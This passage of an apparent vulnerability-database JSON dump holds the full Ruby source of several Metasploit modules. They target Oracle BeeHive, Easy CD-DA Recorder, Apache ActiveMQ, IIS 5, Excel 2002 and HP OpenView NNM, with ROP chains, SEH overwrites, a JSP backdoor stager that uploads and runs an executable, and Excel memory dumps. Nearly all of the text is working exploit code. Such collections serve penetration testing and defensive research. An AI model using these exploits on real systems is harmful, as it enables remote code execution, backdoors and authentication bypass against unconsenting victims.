super(update_info(info,\n 'Name' => \"Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Oracle BeeHive. 
The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n '1c239c43f521145fa8385d64a9c32243', # Found the vuln first\n 'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ (overlapped finding & PoC)\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2010-4417' ],\n [ 'ZDI', '11-020' ],\n [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 7777\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Oracle Beehive 2', {}]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Jun 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Oracle Beehive's base directory\", '/'])\n ])\n end\n\n\n def check\n res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp'))\n\n if res && /RECXML Prompt Tester/ === res.body\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::NotVulnerable, 'Target does not appear to be Oracle BeeHive')\n end\n\n # Init some names\n exe_name = \"#{Rex::Text.rand_text_alpha(5)}.exe\"\n stager_name = \"#{Rex::Text.rand_text_alpha(5)}.jsp\"\n\n print_status(\"Stager name is: #{stager_name}\")\n print_status(\"Executable name is: #{exe_name}\")\n\n # pwd:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\home\n # Targeted path:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\BEEAPP\\applications\\voice-servlet\\voice-servlet\\prompt-qa\n register_files_for_cleanup(\n \"../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}\"\n )\n\n\n # Ok fire!\n print_status(\"Uploading stager...\")\n res = upload_stager(stager_name, exe_name)\n\n # 
Hmm if we fail to upload the stager, no point to continue.\n unless res\n fail_with(Failure::Unknown, 'Connection timed out.')\n end\n\n print_status(\"Uploading payload...\")\n upload_payload(stager_name)\n end\n\n\n # Our stager is basically a backdoor that allows us to upload an executable with a POST request.\n def get_jsp_stager(exe_name)\n jsp = %Q|<%@ page import=\"java.io.*\" %>\n<%\n ByteArrayOutputStream buf = new ByteArrayOutputStream();\n BufferedReader reader = request.getReader();\n int tmp;\n while ((tmp = reader.read()) != -1) { buf.write(tmp); }\n FileOutputStream fostream = new FileOutputStream(\"#{exe_name}\");\n buf.writeTo(fostream);\n fostream.close();\n Runtime.getRuntime().exec(\"#{exe_name}\");\n%>|\n\n # Since we're sending it as a GET request, we want to keep it smaller so\n # we gsub stuff we don't want.\n jsp.gsub!(\"\\n\", '')\n jsp.gsub!(' ', ' ')\n Rex::Text.uri_encode(jsp)\n end\n\n\n # Stager will be found under:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\BEEAPP\\applications\\voice-servlet\\voice-servlet\\prompt-qa\\\n def upload_stager(stager_name, exe_name)\n jsp_stager = get_jsp_stager(exe_name)\n uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'showRecxml.jsp')\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri,\n 'encode_params' => false, # Don't encode %00 for us\n 'vars_get' => {\n 'evaluation' => jsp_stager,\n 'recxml' => \"..\\\\#{stager_name}%00\"\n }\n })\n end\n\n # Payload will be found under:\n # C:\\oracle\\product\\2.0.1.0.0\\beehive_2\\j2ee\\home\\\n def upload_payload(stager_name)\n uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name)\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'data' => generate_payload_exe(code: payload.encoded)\n })\n end\n\n def print_status(msg)\n super(\"#{rhost}:#{rport} - #{msg}\")\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oracle_beehive_evaluation.rb"}, {"lastseen": "2019-11-03T21:40:38", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry. By persuading the victim to open a specially-crafted PLS file, a remote attacker can execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.\n", "modified": "2017-07-24T13:26:21", "published": "2014-02-10T19:46:09", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/EASYCDDA_PLS_BOF", "href": "", "type": "metasploit", "title": "Easy CD-DA Recorder PLS Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. 
This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'chap0', # Vulnerability discovery and original exploit\n 'Gabor Seljan', # Metasploit module\n 'juan vazquez' # Improved reliability\n ],\n 'References' =>\n [\n [ 'BID', '40631' ],\n [ 'EDB', '13761' ],\n [ 'OSVDB', '65256' ],\n [ 'CVE', '2010-2343' ],\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'BadChars' => \"\\x0a\\x3d\",\n 'Space' => 2454,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\n },\n 'Targets' =>\n [\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\n # easycdda.exe 3.0.114.0\n # audconv.dll 7.0.815.0\n {\n 'Offset' => 1108,\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jun 7 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\n ],\n self.class)\n\n end\n\n def nops\n return make_nops(4).unpack(\"V\").first\n end\n\n def rop_nops(n = 1)\n # RETN (ROP NOP) [audconv.dll]\n [0x1003d55d].pack('V') * n\n end\n\n def exploit\n\n # ROP chain generated by mona.py - See corelan.be\n rop_gadgets =\n [\n 0x1007261e, # POP EDX # RETN [audconv.dll]\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\n 0x1005d288, # POP EBP # RETN [audconv.dll]\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\n 0x00000996, # 0x00000996-> EBX\n 0x1008740c, # POP EDX # RETN [audconv.dll]\n 0x00000040, # 0x00000040-> EDX\n 0x1001826d, # POP ECX # RETN [audconv.dll]\n 0x004364c6, # &Writable location [easycdda.exe]\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\n 
0x100378e6, # RETN (ROP NOP) [audconv.dll]\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\n nops,\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\n ].flatten.pack('V*')\n\n sploit = rop_nops(target['Offset'] / 4)\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\n sploit << [target.ret].pack(\"V\")\n sploit << rop_nops(22)\n sploit << rop_gadgets\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(10000) # Generate exception\n\n # Create the file\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(sploit)\n\n end\nend\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/easycdda_pls_bof.rb"}, {"lastseen": "2019-11-30T12:13:29", "bulletinFamily": "exploit", "description": "This module exploits a source code disclosure in Apache ActiveMQ. The vulnerability is due to the Jetty's ResourceHandler handling of specially crafted URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1 over Windows 2003 SP2 and Ubuntu 10.04.\n", "modified": "2017-07-24T13:26:21", "published": "2012-10-14T20:36:02", "id": "MSF:AUXILIARY/SCANNER/HTTP/APACHE_ACTIVEMQ_SOURCE_DISCLOSURE", "href": "", "type": "metasploit", "title": "Apache ActiveMQ JSP Files Source Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',\n 'Description' => %q{\n This module exploits a source code disclosure in Apache ActiveMQ. 
The\n vulnerability is due to the Jetty's ResourceHandler handling of specially crafted\n URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1\n over Windows 2003 SP2 and Ubuntu 10.04.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Veerendra G.G', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-1587' ],\n [ 'OSVDB', '64020' ],\n [ 'BID', '39636' ],\n [ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(8161),\n OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])\n ])\n end\n\n def run_host(ip)\n\n print_status(\"#{rhost}:#{rport} - Sending request...\")\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n })\n\n if res and res.code == 200\n contents = res.body\n fname = File.basename(datastore['TARGETURI'])\n path = store_loot(\n 'apache.activemq',\n 'text/plain',\n ip,\n contents,\n fname\n )\n print_status(\"#{rhost}:#{rport} - File saved in: #{path}\")\n else\n print_error(\"#{rhost}:#{rport} - Failed to retrieve file\")\n return\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb"}, {"lastseen": "2019-12-07T19:21:48", "bulletinFamily": "exploit", "description": "This module bypasses basic authentication for Internet Information Services (IIS). 
By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.\n", "modified": "2017-07-24T13:26:21", "published": "2012-06-25T20:48:36", "id": "MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "href": "", "type": "metasploit", "title": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',\n 'Description' => %q{\n This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.\n },\n 'References' =>\n [\n [ 'CVE', '2010-2731' ],\n [ 'OSVDB', '66160' ],\n [ 'MSB', 'MS10-065' ],\n [ 'URL', 'http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]\n ],\n 'Author' =>\n [\n 'Soroush Dalili',\n 'sinn3r'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Jul 02 2010\"\n ))\n\n register_options(\n [\n OptString.new(\"TARGETURI\", [true, 'The URI directory where basic auth is enabled', '/'])\n ])\n end\n\n\n def has_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n vprint_status(res.body) if res\n\n return (res and res.code == 401)\n end\n\n def try_auth\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n uri << Rex::Text.rand_text_alpha(rand(10)+5) + \".#{Rex::Text.rand_text_alpha(3)}\"\n\n dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'\n\n user = Rex::Text.rand_text_alpha(rand(10) + 5)\n pass = Rex::Text.rand_text_alpha(rand(10) + 
5)\n\n\n vprint_status(\"Requesting: #{dir}\")\n res = send_request_cgi({\n 'uri' => dir,\n 'method' => 'GET',\n 'authorization' => basic_auth(user,pass)\n })\n vprint_status(res.body) if res\n\n return (res and res.code != 401 and res.code != 404) ? dir : ''\n end\n\n def run\n if not has_auth\n print_error(\"No basic authentication enabled\")\n return\n end\n\n bypass_string = try_auth\n\n if bypass_string.empty?\n print_error(\"The bypass attempt did not work\")\n else\n print_good(\"You can bypass auth by doing: #{bypass_string}\")\n end\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/iis_auth_bypass.rb"}, {"lastseen": "2019-12-07T19:22:22", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. 
This results in arbitrary code execution under the context of the user.\n", "modified": "2017-09-14T02:03:34", "published": "2011-11-21T17:36:47", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS10_038_EXCEL_OBJ_BOF", "href": "", "type": "metasploit", "title": "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. This results in arbitrary code execution under\n the context of the user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nicolas Joly', # Initial discovery\n 'Shahin Ramezany <shahin[at]abysssec.com>', # MOAUB 24 exploit and binary analysis\n 'juan vazquez' # Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2010-0822'],\n ['OSVDB', '65236'],\n ['BID', '40520'],\n ['MSB', 'MS10-038'],\n ['URL', 'https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/']\n ],\n 'Payload' =>\n {\n 'Space' => 4000\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => 'true'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n # This is the one that can be downloaded from MSDN\n 'Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3',\n {\n 'ftCmoReserved' => 0x307d91ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data\n 'CraftedPointer' => 0x307d91a6, # Ptr to PtrToRet in the stored contents on Excel .data\n 'PtrToRet' => 
0x307d908e, # Ptr to Ret - 11Ch\n 'Ret' => 0x30006113 # call ecx from Excel.exe 10.0.2614.0\n }\n ],\n [\n 'Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3',\n {\n 'ftCmoReserved' => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data\n 'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data\n 'PtrToRet' => 0x307de48e, # Ptr to Ret - 11Ch\n 'Ret' => 0x300061a5 # call ecx from Excel.exe 10.0.6501.0\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 8 2010\",\n 'DefaultTarget' => 1))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The filename', 'msf.xls'])\n ])\n end\n\n def exploit\n\n path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2010-0822.xls')\n f = File.open(path, 'rb')\n template = f.read\n f.close\n buf = ''\n buf << template[0..35016]\n buf << [target['ftCmoReserved']].pack('V')\n buf << template[35021..36549]\n buf << [target['PtrToRet']].pack('V')\n buf << [target.ret].pack('V')\n buf << template[36558..36559]\n buf << [target['CraftedPointer']].pack('V')\n buf << template[36564..36609]\n buf << [target['CraftedPointer']].pack('V') # Pass the MSO_804()\n buf << template[36614..36639]\n buf << payload.encoded\n buf << template[40640..template.length]\n file_create(buf)\n\n end\nend\n\n=begin\n\nMemory analysis on Office XP SP2\n\n'ftCmoReserved' => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data\n------------------------------------------------------------------------------------------\n\n0:000> db 0x307de5ac\n307de5ac 00 30 74 00 a6 e5 7d 30-4c 4c 00 55 6e 69 72 42 .0t...}0LL.UnirB\n307de5bc 42 42 42 4c 00 48 50 44-6f 63 55 49 53 55 49 00 BBBL.HPDocUISUI.\n307de5cc 54 72 75 65 00 52 65 73-6f 6c 75 74 69 6f 6e 00 True.Resolution.\n307de5dc 36 30 30 64 70 69 a6 e5-7d 30 74 52 65 73 00 46 600dpi..}0tRes.F\n307de5ec 61 6c 73 65 90 90 90 90-90 90 90 90 90 90 90 90 
alse............\n307de5fc 90 90 90 90 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA\n307de60c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de61c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n\n'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data\n-----------------------------------------------------------------------------------\n\n0:000> db 0x307de5a6\n307de5a6 8e e4 7d 30 a5 61 00 30-74 00 a6 e5 7d 30 4c 4c ..}0.a.0t...}0LL\n307de5b6 00 55 6e 69 72 42 42 42-42 4c 00 48 50 44 6f 63 .UnirBBBBL.HPDoc\n307de5c6 55 49 53 55 49 00 54 72-75 65 00 52 65 73 6f 6c UISUI.True.Resol\n307de5d6 75 74 69 6f 6e 00 36 30-30 64 70 69 [[a6 e5 7d 30]]* ution.600dpi..}0\n307de5e6 74 52 65 73 00 46 61 6c-73 65 90 90 90 90 90 90 tRes.False......\n307de5f6 90 90 90 90 90 90 90 90-90 90 41 41 41 41 41 41 ..........AAAAAA\n307de606 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de616 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n\n* => 0x307de5a6 + 0x3c => 0x307de5e2\n\n'PtrToRet' => 0x307de48e, # Ptr to Ret - 11Ch\n---------------------------------------------\n\n307de48e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de49e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4ae 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4be 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4ce 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4de 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4ee 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de4fe 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de50e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de51e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de52e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 
................\n307de53e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de54e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de55e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de56e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de57e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de58e 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................\n307de59e eb 60 6e 00 50 72 69 6e-8e e4 7d 30 [[a5 61 00 30]]* .`n.Prin..}0.a.0\n307de5ae 74 00 a6 e5 7d 30 4c 4c-00 55 6e 69 72 42 42 42 t...}0LL.UnirBBB\n307de5be 42 4c 00 48 50 44 6f 63-55 49 53 55 49 00 54 72 BL.HPDocUISUI.Tr\n307de5ce 75 65 00 52 65 73 6f 6c-75 74 69 6f 6e 00 36 30 ue.Resolution.60\n307de5de 30 64 70 69 a6 e5 7d 30-74 52 65 73 00 46 61 6c 0dpi..}0tRes.Fal\n307de5ee 73 65 90 90 90 90 90 90-90 90 90 90 90 90 90 90 se..............\n307de5fe 90 90 41 41 41 41 41 41-41 41 41 41 41 41 41 41 ..AAAAAAAAAAAAAA\n307de60e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de61e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de62e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de63e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de64e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de65e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de66e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n307de67e 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n\n* 0x307de48e + 0x11c => 0x307de48e\n\n'Ret' => 0x300061a5 # call ecx from Excel.exe 10.0.6501.0\n----------------------------------------------------------\n\nEXCEL!Ordinal41+0x61a5:\n300061a5 ffd1 call ecx\n300061a7 e00b loopne EXCEL!Ordinal41+0x61b4 (300061b4)\n300061a9 c1536689 rcl dword ptr [ebx+66h],89h\n300061ad 46 inc esi\n300061ae 2a8d8574ffff sub cl,byte ptr [ebp-8B7Bh]\n300061b4 ff5068 
call dword ptr [eax+68h]\n300061b7 1200 adc al,byte ptr [eax]\n300061b9 0400 add al,0\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb"}, {"lastseen": "2019-11-27T19:03:31", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. 
In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.\n", "modified": "2017-09-14T02:03:34", "published": "2011-03-23T15:43:25", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_OVWEBSNMPSRV_URO", "href": "", "type": "metasploit", "title": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. 
In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.\n } ,\n 'Author' =>\n [\n 'jduck' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1960' ],\n [ 'OSVDB', '65427' ],\n [ 'BID', '40637' ],\n [ 'ZDI', '10-105' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 10240, # 10240 byte buffer..\n # In addition to regular HTTP type bad chars, this one also has\n # an issue with \" since the buffer is being passed on the command line.\n 'BadChars' => (0x00..0x1f).to_a.pack('C*') + \"\\x20\\x21\\x22\\x24\\x2c\\x3b\\x3c\\x3e\\x60\",\n 'DisableNops' => true,\n # Manually use FPU to get EIP into ECX\n 'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\",\n 'EncoderOptions' => { 'BufferRegister' => 'ecx' },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01206',\n {\n 'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166\n }\n ],\n [ 'Debug Target',\n {\n 'Ret' => 0xdeadbeef, # crasher\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 08 2010'))\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/jovgraph.exe'\n\n # A long command line option (starts with -) will cause a buffer overflow.\n\n # Action just has to be set, doesn't matter what it is.\n action = rand_text_alphanumeric(1)\n\n # \"timestamp\" cannot be set.\n\n start = 'Unrecognized option: '\n\n # SEH\n seh_offset = 0x2cb0 # 0x13ffb0 - 0x13d300\n seh_frame = generate_seh_record(target.ret)\n\n # Jump back to the payload, after p/p/r jumps to us.\n # NOTE: Putting the jmp_back after the SEH handler seems to avoid problems with badchars..\n # 8 for SEH.Next+SEH.Func, 5 for the jmp_back itself\n distance = seh_offset - 1 + seh_frame.length # dry run\n jmp_back = 
Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n distance = seh_offset - start.length - 1 - jmp_back.length\n jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n\n # A short jump back to the long jump back :)\n jmp_small = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + jmp_back.length.to_s).encode_string\n jmp_small << rand_text(2)\n\n buf = '-'\n buf << payload.encoded\n buf << \"A\" * (seh_offset - start.length - buf.length - jmp_back.length)\n buf << jmp_back\n buf << jmp_small\n buf << [target.ret].pack('V')\n\n # Send the request\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'act' => action,\n 'arg' => buf,\n }\n }, 3)\n\n if res and res.code != 502\n print_error(\"Eek! We weren't expecting a response, but we got one\")\n print_status(res.to_s) if datastore['NNM_DEBUG']\n end\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": 